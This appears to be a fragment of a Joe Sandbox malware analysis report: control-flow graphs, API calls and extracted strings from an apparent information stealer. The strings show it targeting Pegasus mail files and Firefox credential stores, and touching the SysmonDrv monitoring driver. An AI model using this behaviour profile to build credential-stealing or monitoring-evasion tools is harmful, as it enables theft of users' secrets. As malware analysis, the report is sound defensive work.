5483->5374 5484->5459 5503 40681e-406823 5484->5503 5486->5409 5486->5434 5488->5440 5489->5440 5492->5440 5493->5374 5507 406996-4069a0 5494->5507 5495->5440 5496->5507 5497->5502 5509 4062ea 5497->5509 5499->5440 5500->5374 5502->5440 5503->5459 5509->5440 5511->5374 5512->5440 5513->5440
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                                    • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                                    • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                                    • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                                    • API String ID: 4038537762-3617128223
                                                                    • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                                    • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                                    • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                                    • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5516 42b9c5-42b9ce 5517 42b9d5-42b9dd 5516->5517 5518 42ba34-42ba39 5517->5518 5519 42b9df-42b9e4 5517->5519 5520 42bb28-42bb2d 5518->5520 5521 42ba3f-42ba44 5518->5521 5522 42bad0-42bad5 5519->5522 5523 42b9ea-42b9ef 5519->5523 5530 42bb33-42bb38 5520->5530 5531 42bc20-42bc25 5520->5531 5528 42ba4a-42ba4f 5521->5528 5529 42bb9c-42bba1 5521->5529 5526 42badb-42bae0 5522->5526 5527 42bbcf-42bbd4 5522->5527 5524 42b9f5-42b9fa 5523->5524 5525 42bb59-42bb5e 5523->5525 5532 42ba00-42ba05 5524->5532 5533 42bc6c-42bc71 5524->5533 5536 42bd40-42bd45 5525->5536 5537 42bb64-42bb69 5525->5537 5538 42bae6-42baeb 5526->5538 5539 42bcdd-42bce2 5526->5539 5544 42bdba-42bdbf 5527->5544 5545 42bbda-42bbdf 5527->5545 5542 42ba55-42ba5a 5528->5542 5543 42bcab-42bcb0 5528->5543 5540 42bba7-42bbac 5529->5540 5541 42bd6e-42bd73 5529->5541 5546 42bb3e-42bb43 5530->5546 5547 42bd0d-42bd12 5530->5547 5534 42bc2b-42bc30 5531->5534 5535 42bdff-42be04 5531->5535 5552 42be21-42be81 call 40e14e * 4 5532->5552 5553 42ba0b-42ba10 5532->5553 5574 42bf87-42bfa6 call 42ca0d 5533->5574 5575 42bc77-42bc7c 5533->5575 5570 42bc36-42bc3b 5534->5570 5571 42bf6c-42bf77 5534->5571 5572 42be0a-42be0f 5535->5572 5573 42c08d-42c0b0 5535->5573 5558 42bd4b-42bd50 5536->5558 5559 42c018-42c027 5536->5559 5554 42bf09-42bf29 5537->5554 5555 42bb6f-42bb74 5537->5555 5576 42baf1-42baf6 5538->5576 5577 42be9f-42bec5 call 42ad82 5538->5577 5550 42bfd2-42bfe8 5539->5550 5551 42bce8-42bced 5539->5551 5560 42bbb2-42bbb7 5540->5560 5561 42bf39-42bf5c 5540->5561 5562 42bd79-42bd7e 5541->5562 5563 42c02c-42c033 5541->5563 5564 42ba60-42ba65 5542->5564 5565 42be86-42be8f 5542->5565 5578 42bcb6-42bcbb 5543->5578 5579 42bfab-42bfcd call 42b9c5 5543->5579 5568 42bdc5-42bdca 5544->5568 5569 42c038-42c043 5544->5569 5566 42bbe5-42bbea 5545->5566 5567 42c05e-42c084 5545->5567 5548 42bed5-42bef9 5546->5548 5549 42bb49-42bb4e 5546->5549 5556 42bd18-42bd1d 5547->5556 5557 42bfed-42c009 5547->5557 5596 42c010-42c013 5548->5596 5600 42beff-42bf04 5548->5600 5594 42bb54 5549->5594 5595 42c04f 5549->5595 5550->5517 5551->5517 5582 42bcf3-42bd08 5551->5582 5552->5517 5584 42ba16-42ba32 call 438e28 5553->5584 5585 42c0bf-42c0c4 5553->5585 5554->5596 5602 42bf2f-42bf34 5554->5602 5555->5517 5599 42bb7a-42bb97 5555->5599 5556->5517 5586 42bd23-42bd3b 5556->5586 5557->5596 5609 42c00b 5557->5609 5558->5517 5587 42bd56-42bd69 5558->5587 5559->5517 5560->5517 5601 42bbbd-42bbca 5560->5601 5561->5596 5603 42bf62-42bf67 5561->5603 5562->5517 5588 42bd84-42bdaf call 42b9c5 5562->5588 5563->5517 5564->5517 5589 42ba6b-42bacb call 40e14e * 4 5564->5589 5565->5596 5597 42be95-42be9a 5565->5597 5566->5517 5604 42bbf0-42bc15 call 42ca0d 5566->5604 5580 42c086-42c08b 5567->5580 5581 42c0b7-42c0ba 5567->5581 5568->5517 5590 42bdd0-42bdef call 42b9ae 5568->5590 5569->5595 5611 42c045-42c04d 5569->5611 5570->5517 5608 42bc41-42bc61 5570->5608 5571->5596 5605 42bf7d-42bf82 5571->5605 5572->5517 5591 42be15-42be1c 5572->5591 5573->5581 5583 42c0b2 5573->5583 5574->5517 5575->5517 5610 42bc82-42bca6 call 42b9c5 5575->5610 5576->5517 5592 42bafc-42bb11 call 40b7bb 5576->5592 5577->5596 5634 42becb-42bed0 5577->5634 5578->5517 5612 42bcc1-42bcd8 call 447e24 5578->5612 5579->5517 5580->5581 5581->5517 5582->5517 5583->5581 5584->5517 5585->5517 5614 42c0ca-42c0d9 call 447a80 5585->5614 5586->5517 5587->5517 5588->5603 5639 42bdb5 5588->5639 5589->5517 5590->5596 5641 42bdf5-42bdfa 5590->5641 5591->5517 5646 42bb16-42bb23 5592->5646 5594->5517 5625 42c050 5595->5625 5596->5517 5597->5596 5599->5517 5600->5596 5601->5517 5602->5596 5603->5596 5604->5602 5644 42bc1b 5604->5644 5605->5596 5608->5603 5623 42bc67 5608->5623 5609->5596 5610->5517 5611->5567 5611->5595 5612->5517 5623->5596 5625->5625 5634->5596 5639->5596 5641->5596 5644->5596 5646->5517
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                                    • API String ID: 0-3904125897
                                                                    • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                                    • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                                    • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                                    • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5655 40a928-40a970 call 447047 call 438e28 5661 40a973-40a97b 5655->5661 5662 40a9f5-40a9fa 5661->5662 5663 40a97d-40a982 5661->5663 5666 40aa00-40aa05 5662->5666 5667 40aa93-40aa98 5662->5667 5664 40aa43-40aa48 5663->5664 5665 40a988-40a98d 5663->5665 5668 40ab86-40ab8b 5664->5668 5669 40aa4e-40aa53 5664->5669 5670 40a993-40a998 5665->5670 5671 40aaee-40aaf3 5665->5671 5674 40aa0b-40aa10 5666->5674 5675 40ab4c-40ab51 5666->5675 5672 40abb7-40abbc 5667->5672 5673 40aa9e-40aaa3 5667->5673 5688 40ab91-40ab96 5668->5688 5689 40ad0b-40ad10 5668->5689 5680 40aa59-40aa5e 5669->5680 5681 40ac3b-40ac40 5669->5681 5682 40abfe-40ac03 5670->5682 5683 40a99e-40a9a3 5670->5683 5676 40aca4-40aca9 5671->5676 5677 40aaf9-40aafe 5671->5677 5678 40ad42-40ad47 5672->5678 5679 40abc2-40abc7 5672->5679 5686 40ac73-40ac78 5673->5686 5687 40aaa9-40aaae 5673->5687 5690 40ac20-40ac25 5674->5690 5691 40aa16-40aa1b 5674->5691 5684 40acd4-40acd9 5675->5684 5685 40ab57-40ab5c 5675->5685 5694 40b0b3-40b0ba 5676->5694 5695 40acaf-40acb4 5676->5695 5692 40aeb1-40aee5 5677->5692 5693 40ab04-40ab09 5677->5693 5706 40b0f1-40b101 5678->5706 5707 40ad4d-40ad52 5678->5707 5710 40afb5-40afd9 5679->5710 5711 40abcd-40abd2 5679->5711 5712 40aa64-40aa69 5680->5712 5713 40ae1a-40ae25 5680->5713 5720 40b055-40b075 5681->5720 5721 40ac46-40ac4b 5681->5721 5714 40b010-40b029 call 447047 5682->5714 5715 40ac09-40ac0e 5682->5715 5696 40ad73-40ad84 5683->5696 5697 40a9a9-40a9ae 5683->5697 5698 40ae4c-40ae4f 5684->5698 5699 40acdf-40ace4 5684->5699 5700 40ab62-40ab67 5685->5700 5701 40af0a-40af24 5685->5701 5722 40b084-40b0ae call 438e28 5686->5722 5723 40ac7e-40ac83 5686->5723 5718 40ae90-40aea2 call 40a928 5687->5718 5719 40aab4-40aab9 5687->5719 5704 40ab9c-40aba1 5688->5704 5705 40af4e-40af66 5688->5705 5702 40ad16-40ad1b 5689->5702 5703 40b0bf-40b0e2 5689->5703 5716 40ac2b-40ac30 5690->5716 5717 40b02e-40b050 lstrcatW lstrlenW 5690->5717 5708 40aa21-40aa26 5691->5708 5709 40adcf-40ae09 call 40b81c call 40a928 5691->5709 5731 40b0e9-40b0ec 5692->5731 5732 40aeeb-40aef0 5692->5732 5724 40aef5-40af05 5693->5724 5725 40ab0f-40ab14 5693->5725 5694->5661 5695->5661 5746 40acba-40accf lstrcatW 5695->5746 5758 40b009-40b00e 5696->5758 5759 40ad8a 5696->5759 5749 40a9b4-40a9b9 5697->5749 5750 40ad8f-40adbf call 40b129 call 40b7bb 5697->5750 5727 40ae50 5698->5727 5699->5661 5751 40acea-40acfb 5699->5751 5728 40af33-40af49 call 447047 5700->5728 5729 40ab6d-40ab72 5700->5729 5735 40af26 5701->5735 5736 40af2b-40af2e 5701->5736 5702->5661 5753 40ad21-40ad32 5702->5753 5703->5731 5754 40b0e4 5703->5754 5733 40aba7-40abac 5704->5733 5734 40af6b-40af9c NtCreateFile call 438e28 5704->5734 5705->5661 5706->5661 5707->5661 5755 40ad58-40ad6e call 447047 5707->5755 5756 40aa2c-40aa31 5708->5756 5757 40ae0e-40ae15 5708->5757 5709->5661 5710->5661 5737 40abd8-40abdd 5711->5737 5738 40afde-40b007 call 40a928 call 40b129 5711->5738 5760 40ae6d-40ae8b 5712->5760 5761 40aa6f-40aa74 5712->5761 5713->5698 5726 40ae27-40ae2f 5713->5726 5714->5661 5739 40ac14-40ac1b 5715->5739 5740 40b106-40b10b 5715->5740 5741 40ae61-40ae68 5716->5741 5742 40ac36 5716->5742 5717->5661 5763 40aea5-40aeac 5718->5763 5719->5763 5764 40aabf-40aac4 5719->5764 5747 40b077 5720->5747 5748 40b07c-40b07f 5720->5748 5721->5661 5743 40ac51-40ac6e lstrlenW 5721->5743 5722->5661 5723->5661 5744 40ac89-40ac9f call 447047 5723->5744 5724->5661 5725->5661 5765 40ab1a-40ab3c 5725->5765 5726->5741 5766 40ae31-40ae47 5726->5766 5727->5727 5728->5661 5729->5661 5767 40ab78-40ab81 5729->5767 5731->5661 5732->5731 5733->5766 5769 40abb2 5733->5769 5790 40afa1-40afb0 5734->5790 5735->5736 5736->5748 5737->5661 5771 40abe3-40abee 5737->5771 5738->5748 5738->5758 5739->5661 5740->5661 5782 40b111-40b118 5740->5782 5741->5661 5742->5661 5743->5661 5744->5661 5746->5661 5747->5748 5748->5661 5749->5661 5776 40a9bb-40a9e5 5749->5776 5750->5748 5807 40adc5-40adca 5750->5807 5751->5748 5777 40ad01-40ad06 5751->5777 5753->5748 5779 40ad38-40ad3d 5753->5779 5754->5731 5755->5661 5756->5661 5781 40aa37-40aa3e 5756->5781 5757->5661 5758->5748 5759->5748 5760->5661 5761->5661 5784 40aa7a-40aa8e 5761->5784 5763->5661 5764->5661 5786 40aaca-40aade 5764->5786 5765->5748 5787 40ab42-40ab47 5765->5787 5766->5661 5767->5763 5769->5661 5771->5748 5789 40abf4-40abf9 5771->5789 5776->5748 5793 40a9eb-40a9f0 5776->5793 5777->5748 5779->5748 5781->5661 5795 40b11a-40b11c 5782->5795 5796 40b11e 5782->5796 5784->5661 5786->5748 5799 40aae4-40aae9 5786->5799 5787->5748 5789->5748 5790->5661 5793->5748 5801 40b121-40b128 5795->5801 5796->5801 5799->5748 5807->5748
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                                    • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,74DF0880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen
                                                                    • String ID: \??\$kernel32.dll$ntdll.dll
                                                                    • API String ID: 1475610065-320376045
                                                                    • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                                    • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                                    • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                                    • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5960 42fd35-42fd3e 5961 42fd45-42fd4d 5960->5961 5962 42fdb5-42fdba 5961->5962 5963 42fd4f-42fd54 5961->5963 5964 42fe70-42fe75 5962->5964 5965 42fdc0-42fdc5 5962->5965 5966 42fe25-42fe2a 5963->5966 5967 42fd5a-42fd5f 5963->5967 5968 42ff83-42ff88 5964->5968 5969 42fe7b-42fe80 5964->5969 5970 42ff0a-42ff0f 5965->5970 5971 42fdcb-42fdd0 5965->5971 5974 42ff30-42ff35 5966->5974 5975 42fe30-42fe35 5966->5975 5972 42fec5-42feca 5967->5972 5973 42fd65-42fd6a 5967->5973 5982 4301bf-4301d6 5968->5982 5983 42ff8e-42ff93 5968->5983 5976 42fe86-42fe8b 5969->5976 5977 430095-4300a0 5969->5977 5990 430130-43016d call 42fd35 call 430228 5970->5990 5991 42ff15-42ff1a 5970->5991 5980 42fdd6-42fddb 5971->5980 5981 430004-43002c call 42f278 5971->5981 5984 42fed0-42fed5 5972->5984 5985 4300e4-4300ef 5972->5985 5986 42fd70-42fd75 5973->5986 5987 42ffcc-42ffd3 5973->5987 5978 430195-4301b6 5974->5978 5979 42ff3b-42ff40 5974->5979 5988 430051-430075 call 42f278 5975->5988 5989 42fe3b-42fe40 5975->5989 5993 4300b0-4300d4 5976->5993 5994 42fe91-42fe96 5976->5994 5998 4300a6-4300ab 5977->5998 5999 4301dd-4301e0 5977->5999 5978->5999 6012 4301b8-4301bd 5978->6012 6006 42ff46-42ff78 call 42f278 5979->6006 6007 4301e5-4301ea 5979->6007 6009 42fde1-42fde6 5980->6009 6010 430037-43004c 5980->6010 6028 43018e-430193 5981->6028 6033 430032 5981->6033 5982->5999 6015 4301d8 5982->6015 5983->5961 6011 42ff99-42ffbc 5983->6011 5996 43010a-43012b 5984->5996 5997 42fedb-42fee0 5984->5997 6002 4300f1-4300f9 5985->6002 6003 4300fb 5985->6003 6000 42fd7b-42fd80 5986->6000 6001 42ffd8-42fff9 call 42f278 5986->6001 5987->5961 5988->5961 6013 42fe46-42fe4b 5989->6013 6014 43007a-430090 5989->6014 5990->5999 6043 43016f-430174 5990->6043 6004 42ff20-42ff25 5991->6004 6005 430176-43018c 5991->6005 5993->5999 6021 4300da-4300df 5993->6021 5994->5961 6018 42fe9c-42fec0 call 42fd35 5994->6018 5996->5961 5997->5961 6020 42fee6-42ff05 call 42f278 5997->6020 5998->5999 5999->5961 6000->5961 6022 42fd82-42fd9e call 42f625 * 2 6000->6022 6001->6043 6044 42ffff 6001->6044 6002->5996 6002->6003 6023 4300fc 6003->6023 6004->6003 6024 42ff2b 6004->6024 6005->5999 6005->6028 6006->5998 6050 42ff7e 6006->6050 6007->5961 6016 4301f0-43021b call 42f625 * 3 6007->6016 6009->5961 6027 42fdec-42fe16 6009->6027 6010->5961 6011->5999 6029 42ffc2-42ffc7 6011->6029 6012->5999 6013->5961 6031 42fe51-42fe5c call 42f625 6013->6031 6014->5961 6015->5999 6057 430220-430227 6016->6057 6018->5961 6020->5961 6021->5999 6055 42fda3-42fdb3 6022->6055 6023->6023 6024->5961 6039 42fe18 6027->6039 6040 42fe1d-42fe20 6027->6040 6028->5999 6029->5999 6045 42fe61-42fe6b 6031->6045 6033->5999 6039->6040 6040->5961 6043->5999 6044->5999 6045->5961 6050->5999 6055->5961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                                    • API String ID: 4038537762-2469458786
                                                                    • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                                    • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                                    • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                                    • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6193 4262a1-4262b8 6194 4262bc-4262c4 6193->6194 6195 4262c6-4262cb 6194->6195 6196 426335-42633a 6194->6196 6199 4262d1-4262d6 6195->6199 6200 42638a-42638f 6195->6200 6197 426340-426345 6196->6197 6198 4263f4-4263f9 6196->6198 6203 4264a5-4264aa 6197->6203 6204 42634b-426350 6197->6204 6201 426529-42652e 6198->6201 6202 4263ff-426404 6198->6202 6205 426448-42644d 6199->6205 6206 4262dc-4262e1 6199->6206 6207 4264e3-4264e8 6200->6207 6208 426395-42639a 6200->6208 6209 426534-426539 6201->6209 6210 4266ed-4266f2 6201->6210 6211 426616-42661b 6202->6211 6212 42640a-42640f 6202->6212 6213 4264b0-4264b5 6203->6213 6214 426675-42667a 6203->6214 6215 426356-42635b 6204->6215 6216 4265a4-4265a9 6204->6216 6221 426453-426458 6205->6221 6222 426648-42664d 6205->6222 6217 426582-426587 6206->6217 6218 4262e7-4262ec 6206->6218 6219 4266bb-4266c0 6207->6219 6220 4264ee-4264f3 6207->6220 6223 4263a0-4263a5 6208->6223 6224 4265ea-4265ef 6208->6224 6227 4268c6-4268de 6209->6227 6228 42653f-426544 6209->6228 6233 4266f8-4266fd 6210->6233 6234 4269ae-4269cc call 4279e0 6210->6234 6245 426621-426626 6211->6245 6246 426914-426939 6211->6246 6231 4267d4-4267f3 call 422817 6212->6231 6232 426415-42641a 6212->6232 6247 426847-426862 RtlAdjustPrivilege call 4279e0 6213->6247 6248 4264bb-4264c0 6213->6248 6253 426680-426685 6214->6253 6254 42695e-42696d 6214->6254 6249 426361-426366 6215->6249 6250 4265de-4265e5 6215->6250 6237 4265af-4265b4 6216->6237 6238 4268fc-426903 6216->6238 6235 4268e3-4268f7 6217->6235 6236 42658d-426592 6217->6236 6239 4262f2-4262f7 6218->6239 6240 42670f-426719 6218->6240 6229 426972-42699f call 424c44 call 422177 6219->6229 6230 4266c6-4266cb 6219->6230 6255 4268a4-4268ab 6220->6255 6256 4264f9-4264fe 6220->6256 6241 426824-426836 6221->6241 6242 42645e-426463 6221->6242 6251 426942-426959 6222->6251 6252 426653-426658 6222->6252 6225 42676a-426791 6223->6225 6226 4263ab-4263b0 6223->6226 6243 4265f5-4265fa 6224->6243 6244 426908-42690f 6224->6244 6263 4269a6-4269a9 6225->6263 6265 426797-42679c 6225->6265 6257 4267a1-4267c4 6226->6257 6258 4263b6-4263bb 6226->6258 6227->6194 6274 4269d1-4269d6 6228->6274 6275 42654a-426572 call 424995 6228->6275 6229->6263 6328 4269a1 6229->6328 6230->6194 6259 4266d1-4266e8 6230->6259 6231->6263 6310 4267f9-4267fe 6231->6310 6260 426803-42681f 6232->6260 6261 426420-426425 6232->6261 6233->6194 6262 426703-42670a 6233->6262 6234->6194 6235->6194 6236->6194 6278 426598-42659f 6236->6278 6237->6194 6279 4265ba-4265d9 call 426a09 6237->6279 6238->6194 6280 426729-42673a 6239->6280 6281 4262fd-426302 6239->6281 6240->6263 6264 42671f-426724 6240->6264 6241->6194 6266 42683b-426842 6242->6266 6267 426469-42646e 6242->6267 6243->6194 6283 426600-426611 GetPEB 6243->6283 6244->6194 6245->6194 6284 42662c-426643 call 43f000 6245->6284 6246->6263 6276 42693b-426940 6246->6276 6296 426867-426872 6247->6296 6269 4264c6-4264cb 6248->6269 6270 426877-426894 6248->6270 6285 42673f-42675a 6249->6285 6286 42636c-426371 6249->6286 6250->6194 6251->6194 6252->6194 6287 42665e-426670 6252->6287 6253->6194 6288 42668b-4266ab call 426a42 call 41eba8 6253->6288 6254->6194 6255->6194 6272 4268b0-4268c1 6256->6272 6273 426504-426509 6256->6273 6257->6263 6292 4267ca-4267cf 6257->6292 6258->6194 6289 4263c1-4263ef LoadLibraryA 6258->6289 6259->6194 6260->6194 6261->6194 6290 42642b-426443 call 41eba8 call 41f9a4 6261->6290 6262->6194 6263->6194 6264->6263 6265->6263 6266->6194 6267->6194 6293 426474-426495 call 41eb3f 6267->6293 6269->6194 6295 4264d1-4264de call 422817 6269->6295 6270->6263 6297 42689a-42689f 6270->6297 6272->6194 6273->6194 6298 42650f-426524 6273->6298 6274->6194 6304 4269dc-4269e3 6274->6304 6275->6263 6321 426578-42657d 6275->6321 6276->6263 6278->6194 6279->6250 6280->6194 6281->6194 6302 426304-42632a call 422817 call 4244e4 6281->6302 6283->6194 6284->6194 6285->6263 6291 426760-426765 6285->6291 6286->6194 6306 426377-42637b 6286->6306 6287->6194 6288->6263 6330 4266b1-4266b6 6288->6330 6289->6194 6290->6278 6291->6263 6292->6263 6293->6263 6327 42649b-4264a0 6293->6327 6295->6262 6296->6194 6297->6263 6298->6194 6302->6297 6333 426330 6302->6333 6324 42637e-426385 6306->6324 6310->6263 6321->6263 6324->6194 6327->6263 6328->6263 6330->6263 6333->6263
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                                    • API String ID: 1029625771-1616023887
                                                                    • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                                    • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                                    • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                                    • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M0@$UL6T$VL6T
                                                                    • API String ID: 0-769956738
                                                                    • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                                    • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                                    • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                                    • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6767 40b129-40b139 6768 40b13c-40b144 6767->6768 6769 40b146-40b14b 6768->6769 6770 40b17e-40b183 6768->6770 6771 40b1b7-40b1bc 6769->6771 6772 40b14d-40b152 6769->6772 6773 40b215-40b21a 6770->6773 6774 40b189-40b18e 6770->6774 6775 40b1c2-40b1c7 6771->6775 6776 40b32c-40b331 6771->6776 6777 40b2a5-40b2aa 6772->6777 6778 40b158-40b15d 6772->6778 6779 40b220-40b225 6773->6779 6780 40b359-40b35e 6773->6780 6781 40b194-40b199 6774->6781 6782 40b2db-40b2e0 6774->6782 6785 40b4c7-40b4cc 6775->6785 6786 40b1cd-40b1d2 6775->6786 6783 40b646-40b65b 6776->6783 6784 40b337-40b33c 6776->6784 6789 40b2b0-40b2b5 6777->6789 6790 40b584-40b5a7 call 40a928 6777->6790 6791 40b163-40b168 6778->6791 6792 40b3c8-40b3cd 6778->6792 6795 40b4a9-40b4c2 6779->6795 6796 40b22b-40b230 6779->6796 6787 40b360-40b365 6780->6787 6788 40b395-40b3b8 6780->6788 6797 40b40f-40b414 6781->6797 6798 40b19f-40b1a4 6781->6798 6793 40b601-40b607 call 40a928 6782->6793 6794 40b2e6-40b2eb 6782->6794 6808 40b746-40b749 6783->6808 6817 40b661-40b666 6783->6817 6801 40b342-40b347 6784->6801 6802 40b66b-40b6a6 call 40b81c call 40a928 6784->6802 6824 40b4d2-40b4f3 6785->6824 6825 40b74e-40b753 6785->6825 6803 40b494-40b497 6786->6803 6804 40b1d8-40b1dd 6786->6804 6805 40b6ab-40b6ca 6787->6805 6806 40b36b-40b370 6787->6806 6788->6808 6809 40b3be-40b3c3 6788->6809 6818 40b5b2-40b5f1 call 40b81c call 40b7bb 6789->6818 6819 40b2bb-40b2c0 6789->6819 6790->6817 6855 40b5ad 6790->6855 6820 40b503-40b532 6791->6820 6821 40b16e-40b173 6791->6821 6810 40b6d3-40b6fc 6792->6810 6811 40b3d3-40b3d8 6792->6811 6837 40b60c-40b616 6793->6837 6822 40b2f1-40b2f6 6794->6822 6823 40b61b-40b641 call 438e28 6794->6823 6795->6768 6812 40b236-40b23b 6796->6812 6813 40b569-40b574 6796->6813 6815 40b710-40b73f call 40b129 6797->6815 6816 40b41a-40b41f 6797->6816 6799 40b541-40b55e 6798->6799 6800 40b1aa-40b1af 6798->6800 6830 40b741 6799->6830 6831 40b564 6799->6831 6828 40b1b5 6800->6828 6829 40b2cf-40b2d6 6800->6829 6801->6768 6845 40b34d-40b354 6801->6845 6802->6768 6851 40b498 6803->6851 6804->6768 6833 40b1e3-40b210 call 447047 call 447e24 6804->6833 6805->6808 6842 40b6cc-40b6d1 6805->6842 6806->6768 6847 40b376-40b381 6806->6847 6808->6768 6809->6808 6843 40b703-40b70b call 40b81c 6810->6843 6844 40b6fe 6810->6844 6811->6768 6849 40b3de-40b404 call 40b129 6811->6849 6812->6768 6836 40b241-40b295 call 40b129 call 40b81c 6812->6836 6813->6808 6832 40b57a-40b57f 6813->6832 6815->6808 6815->6830 6816->6768 6850 40b425-40b470 call 438e28 call 447e24 6816->6850 6817->6808 6818->6808 6881 40b5f7-40b5fc 6818->6881 6819->6768 6839 40b2c6-40b2cc 6819->6839 6826 40b534 6820->6826 6827 40b539-40b53c 6820->6827 6821->6768 6852 40b175-40b17c 6821->6852 6822->6768 6841 40b2fc-40b321 6822->6841 6823->6768 6824->6808 6853 40b4f9-40b4fe 6824->6853 6825->6768 6848 40b759-40b7ba NtReadFile call 438e28 NtClose 6825->6848 6826->6827 6827->6768 6828->6768 6829->6768 6830->6808 6831->6808 6832->6808 6833->6768 6836->6808 6884 40b29b-40b2a0 6836->6884 6837->6768 6839->6829 